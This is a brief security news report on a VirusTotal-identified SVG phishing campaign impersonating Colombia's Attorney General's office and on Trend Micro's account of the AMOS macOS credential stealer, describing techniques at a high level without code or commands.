Cybersecurity researchers have flagged a malware campaign that weaponizes Scalable Vector Graphics (SVG) files to deliver phishing attacks impersonating Colombia’s Fiscalía General de la Nación, the Office of the Attorney General. The details were highlighted by VirusTotal.
Key finding: VirusTotal said it identified 44 unique SVG files that remained undetected by antivirus engines due to obfuscation, polymorphism and the inclusion of large amounts of junk code designed to defeat static detection methods.
The campaign distributes the SVGs via email, each containing an embedded JavaScript payload that decodes and injects a Base64-encoded HTML phishing page masquerading as a portal for Fiscalía General de la Nación.
The faux portal then imitates a legitimate document download process with a fake progress bar, while covertly triggering the download of a ZIP archive in the background. The exact contents of the ZIP file were not disclosed by researchers.
In total, as many as 523 SVG files have been detected in the wild, with the earliest sample dating back to August 14, 2025. VirusTotal also noted that the earliest samples were larger – around 25 MB – and the size has decreased over time as attackers refined their payloads.
Separately, researchers highlighted a broader trend of threat actors relying on cracked software and ClickFix-style techniques to deliver malware on macOS. The activity has been linked to the macOS stealer AMOS, which Trend Micro describes as capable of stealing credentials, browser data, cryptocurrency wallets, Telegram chats, VPN profiles, keychain items and other files from common folders.
Trend Micro notes that AMOS illustrates macOS is no longer a peripheral target and has become a lucrative focus for attackers as enterprises increasingly adopt Apple devices.
Trend Micro also observed that, despite macOS Sequoia introducing stronger Gatekeeper protections to block unsigned DMG installations, attackers continue to pivot to terminal-based delivery methods that bypass some controls. The report emphasizes that defense-in-depth measures remain essential and should not rely solely on built-in OS protections, given attackers’ willingness to adapt.